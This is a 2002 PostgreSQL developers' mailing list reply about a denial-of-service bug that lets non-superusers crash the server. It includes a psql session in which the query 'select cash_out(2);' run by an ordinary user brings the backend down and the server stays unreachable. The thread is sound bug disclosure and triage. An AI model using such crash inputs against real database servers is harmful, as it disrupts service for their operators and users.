Re: [SECURITY] DoS attack on backend possible (was: Re:

Gavin Sherry <swm@linuxworld.com.au>

From: Gavin Sherry <swm@linuxworld.com.au>
To: Justin Clift <justin@postgresql.org>
Cc: pgsql-hackers@postgresql.org
Date: 2002-08-12T02:41:15Z
Lists: pgsql-hackers
On Mon, 12 Aug 2002, Justin Clift wrote:

> Hi Chris,
> 
> Christopher Kings-Lynne wrote:
> > 
> <snip> 
> > Still, I believe this should require a 7.2.2 release.  Imagine a university
> > database server for a course for example - the students would just crash it
> > all the time.
> 
> Hey yep, good point.
> 
> Is this the only way that we know of non postgresql-superusers to be
> able to take out the server other than by extremely non-optimal,
> resource wasting queries?
> 

Check the TODO:

You are now connected as new user s.
template1=> select cash_out(2);
server closed the connection unexpectedly
        This probably means the server terminated abnormally
        before or while processing the request.
The connection to the server was lost. Attempting reset: Failed.
!> \q
[swm@laptop a]$ bin/psql template1
psql: could not connect to server: Connection refused
        Is the server running locally and accepting
        connections on Unix domain socket "/tmp/.s.PGSQL.3987"?
[swm@laptop a]$

---

Gavin